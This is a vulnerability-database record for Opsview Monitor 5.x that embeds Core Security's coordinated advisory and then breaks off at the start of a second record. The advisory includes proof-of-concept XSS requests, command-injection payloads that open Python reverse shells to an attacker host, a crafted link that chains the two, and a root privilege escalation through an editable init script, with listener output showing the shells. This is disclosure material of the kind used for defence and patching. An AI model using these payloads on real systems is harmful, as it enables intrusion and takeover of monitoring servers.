**Vulnerability Description**\n\nOpsview\u0027s website states that:\n\nOpsview[1] builds monitoring software that helps DevOps understand how\nthe performance of their hybrid IT infrastructure \u0026 apps impacts\nbusiness service delivery. Opsview Monitor supports +3500 Nagios plugins\nand service checks making it easy to monitor everything from Docker and\nVMware to Amazon Web Services, Hyper-V and more. \n\n4. **Vulnerable Packages**\n\n . Opsview Monitor 5.4\n . Opsview Monitor 5.3\n . Opsview Monitor 5.2\n\nOther products and versions might be affected, but they were not tested. \n\n5. **Vendor Information, Solutions and Workarounds**\n\nOpsview released the following versions of its product that fix the\nreported issues. Opsview Monitor 6.0\n . Opsview Monitor 5.4.2\n . Opsview Monitor 5.3.1\n\nIn addition, Opsview published the following release notes:\n\n . https://knowledge.opsview.com/v5.4/docs/whats-new\n . https://knowledge.opsview.com/v5.3/docs/whats-new\n\n6. **Credits**\n\nThese vulnerabilities were discovered and researched by Fernando Diaz\nand Fernando Catoira from Core Security Consulting Services. The\npublication of this advisory was coordinated by Leandro Cuozzo from Core\nAdvisories Team. \n \n7. \nMultiple vulnerabilities were found in the context of this appliance,\nwhich could allow a remote attacker to compromise the system. \nVulnerabilities described in 7.1 and 7.2 could be abused to execute\nmalicious JavaScript code in the context of a legitimate user. \nIn addition, issues presented in 7.3 and 7.4 could allow an attacker to\nobtain command execution on the system as the nagios user. \n\n7.1. **Reflected Cross-Site Scripting in Diagnostics**\n\n[CVE-2018-16148] The \u0027diagnosticsb2ksy\u0027 parameter of the \u0027/rest\u0027\nendpoint is vulnerable to Cross-Site Scripting. 
\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1\nHTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401;\nauth_tkt=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%3D%3D\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\n-----/\n\n7.2. **Persistent Cross-Site Scripting in Settings endpoint**\n\n[CVE-2018-16147] The \u0027data\u0027 parameter of the \u0027/settings/api/router\u0027\nendpoint is vulnerable to Cross-Site Scripting. The following proof of\nconcept demonstrates the vulnerability:\n \n/-----\nPOST /settings/api/router?_dc=1521575692128 HTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: rifle\nx-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 506\nCookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256;\nauth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D\nConnection: 
close\n\n[{\"action\":\"SettingsServer\",\"method\":\"setObjecttypeState\",\"data\":[\"\u003c/script\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\",\"{\\\"storeState\\\":{\\\"sorters\\\":[{\\\"root\\\":\\\"data\\\",\\\"property\\\":\\\"name\\\",\\\"direction\\\":\\\"ASC\\\"}],\\\"filters\\\":[],\\\"pageSize\\\":50,\\\"page\\\":1}}\"],\"type\":\"rpc\",\"tid\":2},{\"action\":\"SettingsServer\",\"method\":\"setObjecttypeState\",\"data\":[\"profile\",\"{\\\"storeState\\\":{\\\"sorters\\\":[{\\\"root\\\":\\\"data\\\",\\\"property\\\":\\\"name\\\",\\\"direction\\\":\\\"ASC\\\"}],\\\"filters\\\":[],\\\"pageSize\\\":50,\\\"page\\\":1}}\"],\"type\":\"rpc\",\"tid\":3}]\n-----/\n\nThe input will be stored without any sanitization and rendered every\ntime the /settings section is visited by the user. It\u0027s important to\npoint that this XSS is self stored and it\u0027s executed only in the context\nof the victim\u0027s session. However, this vulnerability can be exploited by\nan attacker to gain persistency and execute the malicious code each time\nthe victim accesses to the settings section. 
\nExcerpt of the source code showing the injected script tag:\n\n/-----\n[{\"property\":\"name\",\"root\":\"data\",\"direction\":\"ASC\"}]}},\"contact\":{\"storeState\":{\"pageSize\":50,\"filters\":[],\"page\":1,\"sorters\":[{\"direction\":\"ASC\",\"property\":\"name\",\"root\":\"data\"}]}},\"\u003c/script\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\":{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"pageSize\":50,\"filters\":[],\"page\":1}},\"hostcheckcommand\":{\"storeState\":{\"pageSize\":50,\"filters\":[],\"page\":1,\"sorters\":[{\"direction\":\"ASC\",\"property\":\"priority\",\"root\":\"data\"}]}},\"netflow_collector\":{\"storeState\":{\"sorters\":[{\"direction\":\"ASC\",\"root\":\"data\",\"property\":\"name\"}],\"page\":1,\"filters\":[],\"pageSize\":50}},\"\u003cscript\u003ealert(4)\u003c/script\u003e\":{\"storeState\":{\"sorters\":[{\"direction\":\"ASC\",\"root\":\"data\",\"property\":\"name\"}],\"\n-----/\n\n7.3. **Notification abuse leading to remote command execution**\n\n[CVE-2018-16146] Opsview Web Management console provides a functionality\naccessible by an authenticated administrator to test notifications that\nare triggered under certain configurable events. The \u0027value\u0027 parameter\nis not properly sanitized, leading to an arbitrary command injection\nexecuted on the system with nagios\u0027 user privileges. 
\n \nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /rest/config/notificationmethod/testnotification?_dc=1520444703477\nHTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0)\nGecko/20100101 Firefox/58.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: admin\nx-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 376\nCookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0;\nopsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13;\nauth_tkt=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%3D%3D\nConnection: close\n\n{\"message\":\"Test\nMessage\",\"command\":\"submit_xmpp_script\",\"variables\":[],\"test_variables\":[{\"name\":\"PAGER\",\"value\":\"123123123\n|| python -c \u0027import\nsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"\u003cattackerIP\u003e\\\",16000));os.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);\u0027\"}],\"id\":\"20\"}\n-----/\n\n/-----\nnc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 43016)\n$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n-----/\n\nAdditionally, it is possible to combine this issue with a redirection\nfunctionality within the management console and the vulnerability\ndescribed in 7.1 (Reflected Cross-Site Scripting), to build a specially\ncrafted link that could be sent to an administrator to trigger a reverse\nshell. \n\nIn order to perform the attack, consider the following:\n\n. API\u0027s sensitive actions require a \u0027restToken\u0027 to be processed. 
This\ntoken could be obtained by a Cross-Site Scripting attack from a specific\nendpoint (/settings). Abuse the login page redirection functionality to force the user to\naccess the Cross-Site Scripting vulnerable URL described in 7.1 (you may\nalso abuse the Cross-Site scripting vulnerability reported in\nhttps://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). \nIf the user is already authenticated he will be automatically redirected. \nOtherwise, the login page will appear and the redirection will take\nplace after a successful login. \n\nThe following proof of concept presents a crafted link that could\ntrigger a reverse shell if accessed by an administrator:\n\n/-----\nhttps://\u003cserverIP\u003e/login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%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%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1\n-----/\n\nOnce clicked, the authenticated administrator will be redirected to the\nvulnerable section where his browser will perform a request to the\n\u0027/settings\u0027 endpoint in order to obtain a valid \u0027restToken\u0027. Finally,\nusing that token, the API request to\n\u0027rest/config/notificationmethod/testnotification\u0027 will be exploited thus\nresulting in a reverse shell. \n\n7.4. 
**Rancid test connection functionality abuse leading to command\nexecution**\n\n[CVE-2018-16144] NetAudit is a section within Network Analyzer that\nallows the user to automate the backing up of network devices\u0027\nconfiguration files to a centralized location. The test connection\nfunctionality is vulnerable to command injection due to an improper\nsanitization of the \u0027rancid_password\u0027 parameter. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: admin\nx-opsview-token: b3d716e0157fd6337e6978220188051d8c578850\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 434\nCookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f;\nauth_tkt=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%3D%3D\nConnection: close\n\nip=\u003cattackerIP\u003e++++++\u0026rancid_vendor=1\u0026rancid_username=234234+add+password+xxxxx\u0026rancid_connection_type=telnet\u0026rancid_autoenable=1\u0026rancid_password=2342342342+%3b+sleep%2011%3b%20`python+-c+\u0027import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect((\"\u003cattackerIP\u003e\",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call([\"/bin/sh\",\"-i\"])%3b\u0027`\u0026host_id=2\n-----/\n\n/-----\nnc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 43016)\n$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n$ uname -a\nLinux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP 
Tue Jan 9 23:01:34\nUTC 2018 x86_64 x86_64 x86_64 GNU/Linux\n-----/\n\n7.5. However, the\n\u0027/etc/init.d/opsview-reporting-module\u0027 script invokes the\n\u0027/opt/opsview/jasper/bin/db_jasper\u0027 script before dropping root\nprivileges. \n \nThe following excerpt shows the vulnerable code:\n \n/-----\n/etc/init.d/opsview-reporting-module:\n\n/opt/opsview/jasper/bin/db_jasper db_exists 2\u003e /dev/null\nif [ $? != 0 ]; then\n echo \"Attempted to start jasperserver but MySQL credentials are wrong.\"\n exit 0\nfi\n\nDAEMON=/opt/opsview/jasper/bin/rc.jasperserver\n\ntest -x $DAEMON || exit 0\n\n# Switch to opsview user if run as root\nid | grep \"uid=0(\" \u003e/dev/null\nif [ $? = 0 ] ; then\n su - opsview -c \"$DAEMON $@\"\nelse\n exec $DAEMON $@\nfi\n-----/\n\nThe file \u0027/opt/opsview/jasper/bin/db_jasper\u0027, which is invoked by the\nvulnerable script, can be edited by the nagios user which belongs to the\n\u0027opsview\u0027 group. \n \n/-----\nls -ltr /opt/opsview/jasper/bin/db_jasper\n-rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017\n/opt/opsview/jasper/bin/db_jasper\nnagios@image-builder-299:/home/admin$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n-----/\n\nSince \u0027db_jasper\u0027 receives \u0027db_exists\u0027 as an argument, which is later\nused in a case statement, an attacker could edit that specific part of\nthe script in order to execute arbitrary code once the appliance is\nrebooted. 
\n\nThe following excerpt shows the attacker\u0027s bash script which, after\nexecution, will trigger a reverse shell with root privileges:\n\n/-----\nwhile [ \"x$1\" != \"x\" ] ; do\n case \"$1\" in\n db_export)\n db_export\n ;;\n db_export_test)\n db_export_test\n ;;\n db_export_initial)\n TEST=1\n db_backup\n ;;\n db_import)\n db_import\n ;;\n db_install)\n db_install\n ;;\n db_backup)\n db_backup\n ;;\n db_restore)\n db_restore\n ;;\n db_exists)\n python -c \u0027import\nsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\u003cattackerIP\u003e\",16000));os.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);\u0027 \u0026\n db_exists\n exit $?\n ;;\n db_upgrade)\n db_upgrade\n exit $?\n ;;\n *)\n die \"Usage: $0\n{db_export|db_import|db_install|db_backup|db_restore}\"\n ;;\n\n esac\n shift\ndone\n-----/\n\n/-----\n$nc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 45566)\n# id\nuid=0(root) gid=0(root) groups=0(root)\n-----/\n\n8. **Report Timeline**\n\n2018-05-03: Core Security sent an initial notification to Opsview,\nasking for GPG keys in order to send draft advisory. \n2018-05-04: Opsview replied attaching its GPG keys. \n2018-05-04: Core Security sent the encrypted draft advisory. \n2018-05-04: Opsview confirmed the reception of the advisory and informed\nan initial response would be ready by May 11th. \n2018-05-11: Opsview replied saying they were able to reproduce all of\nthe reported vulnerabilities and confirmed that they were present in all\nsupported versions of Opsview Monitor (5.4, 5.3 and 5.2). \nIn addition, Opsview informed that were planning to release a fix for\nthese versions by the end of July. \n2018-05-11: Core Security thanked the confirmation. 
\n2018-06-25: Opsview informed that they were planning to release a major\nupdate for the product (6.0) at the end of July. This update will\naddress all reported vulnerabilities. Also, they informed that the\nprevious versions of the product would be fixed by the end of August. \n2018-06-27: Core Security thanked the status update and asked for a\ntentative public disclosure date. \n2018-07-16: Core Security requested a status update. \n2018-07-18: Opsview proposed to set a tentative publication date by the\nend of August when they release the fixes for its earlier versions. \n2018-07-18: Core Security agreed with the Opsview\u0027s proposal. \n2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0\nrelease will be available on July 25th. In addition, they\ninformed that they didn\u0027t have the exact release date for the updates to\nprevious versions of the product. \n2018-08-06: Core Security requested a status update for the remaining\nfixes. \n2018-08-13: Opsview replied saying that they were targeting the week of\nAugust 24th for release the fixes of their earlier product versions and\nthey would confirm the exact date at the end of the next week. \n2018-08-13: Core Security thanked the reply. \n2018-08-24: Opsview informed Core Security that the remaining fixed\nversions will be available on August 29th. \n2018-08-24: Core Security thanked the update and proposed September 4th\nas the coordinated release date. \n2018-08-28: Opsview agreed on the proposed release date. \n2018-09-04: Advisory CORE-2018-0008 published. \n\n9. **References**\n\n[1] https://www.opsview.com/solutions\n\n10. **About CoreLabs**\n\nCoreLabs, the research center of Core Security, is charged with\nanticipating the future needs and requirements for information security\ntechnologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber attack planning and simulation,\nsource code auditing, and cryptography. 
Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at: http://corelabs.coresecurity.com. \n\n11. **About Core Security**\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The\ncompany\u0027s threat-aware, identity \u0026 access, network security, and\nvulnerability management solutions provide actionable insight and\ncontext needed to manage security risks across the enterprise. This\nshared insight gives customers a comprehensive view of their security\nposture to make better security remediation decisions. Better insight\nallows organizations to prioritize their efforts to protect critical\nassets, take action sooner to mitigate access risk, and react faster if\na breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. **Disclaimer**\n\nThe contents of this advisory are copyright (c) 2018 Core Security and\n(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-16145"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010273"
},
{
"db": "CNVD",
"id": "CNVD-2018-17451"
},
{
"db": "VULMON",
"id": "CVE-2018-16145"
},
{
"db": "PACKETSTORM",
"id": "149236"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-16145",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010273",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-17451",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201809-154",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-16145",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "149236",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17451"
},
{
"db": "VULMON",
"id": "CVE-2018-16145"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010273"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16145"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-154"
}
]
},
"id": "VAR-201809-0903",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17451"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17451"
}
]
},
"last_update_date": "2023-12-18T12:01:17.674000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "5.3.1 - Security Update",
"trust": 0.8,
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"title": "5.4.2 Released: 04th September 2018",
"trust": 0.8,
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"title": "Patch for OpsviewMonitor Local Privilege Escalation Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/139523"
},
{
"title": "Opsview Monitor Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=84506"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17451"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010273"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-154"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-732",
"trust": 1.0
},
{
"problemtype": "CWE-264",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010273"
},
{
"db": "NVD",
"id": "CVE-2018-16145"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://seclists.org/fulldisclosure/2018/sep/3"
},
{
"trust": 1.8,
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"trust": 1.8,
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"trust": 1.8,
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16145"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-16145"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/732.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://\u003cserverip\u003e/settings/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16148"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16144"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16146"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://www.cvedetails.com/cve/cve-2016-2511/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16147"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://www.opsview.com/solutions"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17451"
},
{
"db": "VULMON",
"id": "CVE-2018-16145"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010273"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16145"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-154"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-17451"
},
{
"db": "VULMON",
"id": "CVE-2018-16145"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010273"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16145"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-154"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-17451"
},
{
"date": "2018-09-05T00:00:00",
"db": "VULMON",
"id": "CVE-2018-16145"
},
{
"date": "2018-12-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010273"
},
{
"date": "2018-09-05T17:57:27",
"db": "PACKETSTORM",
"id": "149236"
},
{
"date": "2018-09-05T21:29:02.627000",
"db": "NVD",
"id": "CVE-2018-16145"
},
{
"date": "2018-09-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-154"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-17451"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2018-16145"
},
{
"date": "2018-12-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010273"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-16145"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-154"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-154"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Opsview Monitor Vulnerabilities related to authorization, permissions, and access control",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010273"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control issues",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-154"
}
],
"trust": 0.6
}
}
VAR-201809-0904
Vulnerability from variot - Updated: 2023-12-18 12:01
The web management console of Opsview Monitor 5.4.x before 5.4.2 provides functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The value parameter is not properly sanitized, leading to arbitrary command injection with the privileges of the nagios user account. Opsview Monitor contains a command injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Opsview Monitor is a virtual appliance designed to be deployed in an organization's network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. Opsview Monitor has a command execution vulnerability that allows an attacker to obtain command execution on the system as the nagios user.
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Opsview Monitor Multiple Vulnerabilities
- Advisory Information
Title: Opsview Monitor Multiple Vulnerabilities
Advisory ID: CORE-2018-0008
Advisory URL: http://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities
Date published: 2018-09-04
Date of last update: 2018-09-04
Vendors contacted: Opsview
Release mode: Coordinated release
- Vulnerability Information
Class: Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144, CVE-2018-16145
- Vulnerability Description
Opsview's website states that:
Opsview[1] builds monitoring software that helps DevOps understand how the performance of their hybrid IT infrastructure & apps impacts business service delivery. Opsview Monitor supports +3500 Nagios plugins and service checks making it easy to monitor everything from Docker and VMware to Amazon Web Services, Hyper-V and more.
- Vulnerable Packages
. Opsview Monitor 5.4
. Opsview Monitor 5.3
. Opsview Monitor 5.2
Other products and versions might be affected, but they were not tested.
- Vendor Information, Solutions and Workarounds
Opsview released the following versions of its product that fix the reported issues.
. Opsview Monitor 6.0
. Opsview Monitor 5.4.2
. Opsview Monitor 5.3.1
In addition, Opsview published the following release notes:
. https://knowledge.opsview.com/v5.4/docs/whats-new
. https://knowledge.opsview.com/v5.3/docs/whats-new
- Credits
These vulnerabilities were discovered and researched by Fernando Diaz and Fernando Catoira from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. Vulnerabilities described in 7.1 and 7.2 could be abused to execute malicious JavaScript code in the context of a legitimate user. Finally, the issue found in one of the scripts run during the boot process presented in 7.5 would allow attackers to elevate their privileges from nagios user to root after a system restart, hence obtaining full control of the appliance.
7.1. Reflected Cross-Site Scripting in Diagnostics
[CVE-2018-16148] The 'diagnosticsb2ksy' parameter of the '/rest' endpoint is vulnerable to Cross-Site Scripting.
The following proof of concept demonstrates the vulnerability:
/-----
GET /rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1 HTTP/1.1
